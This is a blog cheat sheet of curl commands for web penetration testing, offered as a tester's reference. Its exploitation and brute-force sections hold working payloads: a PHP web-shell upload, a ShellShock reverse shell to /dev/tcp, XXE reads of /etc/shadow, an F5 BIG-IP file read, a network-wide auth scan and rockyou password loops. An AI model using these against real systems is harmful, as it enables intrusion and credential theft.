Web Penetration Testing with Curl Cheatsheet

February 06, 2024

 In lot of scenarios, we usually don't have access to GUI access to web applications but in most of the scenarios - you can find curl installed on the test machine - so, below is a simple cheat sheet to run basic checks 

#Get request using Curl
curl -I http://10.10.10.10

# Send Post Request
curl --data "param1=value1&param2=value2" http://10.10.10.10

#Check for Trace Method
curl -k -v -X TRACE http://10.10.10.10

#PUT Request 
curl -X PUT -d "PUT request data" http://10.10.10.10
curl -kL https://10.10.10.10 -T file.txt

#HEAD Request 
curl -I http://10.10.10.10

#Test DEBUG Method --> if Response "OK" --> DEBUG is enabled
curl -X DEBUG https://10.10.10.10 -k -v -H "Command: stop-debug"

#Ignore SSL warnings
curl -k http://10.10.10.10

#Follow Redirection 
curl -L http://10.10.10.10

#Add headers in a JSON GET request 
curl -i -H "Accept: application/json" -H "Content-Type: application/json" http://10.10.10.10

#Add headers in a request XML GET request 
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET http://10.10.10.10

#XML POST request 
curl -k -X POST -H "Content-Type: application/xml" -H "Accept: application/xml" -d "<Request><Login>my_login</Login><Password>my_password</Password></Request>" https://10.10.10.10

#File Upload
curl -X POST -d @filename http://10.10.10.10

#Proxy Testing
 curl -kL https://google.com --proxy http://10.10.10.10:443

Login and Session Management using CURL 
#GET request Login using Curl 
curl --user user:pass http://10.10.10.10
curl -u user:pass http://10.10.10.10

#JSON POST Request Login 
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" --d'{"login":"my_login","password":"my_password"}'  --user "login:password"     

#Curl POST Request 
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" -d '{"productId": 123456, "quantity": 100}'  
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "param1=value1&param2=value2"  https://10.10.10.10 

#Save the session as cookie 
curl --user user:pass --cookie-jar ./somefile https://10.10.10.10

#Login using the saved session
curl --cookie ./somefile  https://10.10.10.10

#Login with Authorization: Basic
curl http://10.10.10.10/console --basic -v -u root:root  

#Login with Digest Authorization 
curl -v --digest --user 'admin:admin' http://10.10.10.10/console

#Upload a file using PUT method
curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://10.10.10.10/test/shell.php 

Information Gathering using CURL

#Iterate a number from 1 to 20 in the given Variable and check the difference 
for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>';done

#Get all the links from a page 
curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

#get Text in much better readable Format 
curl 10.11.1.71 -s -L | html2text -width '99' | uniq 

#Finding Basic Authorization Hosts 100.64.0.0-100.127.255.255
parallel -j250 'if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:80 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}; fi; if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:8080 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}:8080; fi' ::: {1..255} ::: {1..255} ::: {64..127} > auth_basic.txt

Exploitation

#Exploiting ShellShock using CURL
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1 " http://10.10.10.2:80/cgi-bin/user.sh

#XXE - When you find /soap or /soap/servlet/rpcrouter Directory
curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d  '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <faultactor>&xxe;</faultactor>' 

curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d  '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <faultactor>&xxe;</faultactor>' 

curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY test SYSTEM "https://mail.google.com"> ]> <faultactor>&test;</faultactor>'

#LFI on Apache httpd (F5 BIG-IP load balancer)
curl -kL --cipher 'DEFAULT:!DH' 'https://10.10.10.10/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

Brute forcing using Curl

#One Liner
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass" ;echo $pass & done

#Better for readability
for pass in $(cat /usr/share/wordlists/rockyou.txt); do
	http_code=$(curl https://10.10.10.10 -k --digest -u admin:"$pass" -w '%{http_code}' -o /dev/null -s )
		if [[ $http_code -ne 401 ]]; then 
			echo "Password Cracked $pass"
			break 2 
		elif [[ $http_code -eq 401 ]]; then 
			echo "Wrong Password: '$pass' --- '$http_code'"
		fi
done

OpenSSL Errors

#Resolving SSL routines::dh key too small
curl https://10.10.10.10 -kL --cipher 'DEFAULT:!DH'


,
By:
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment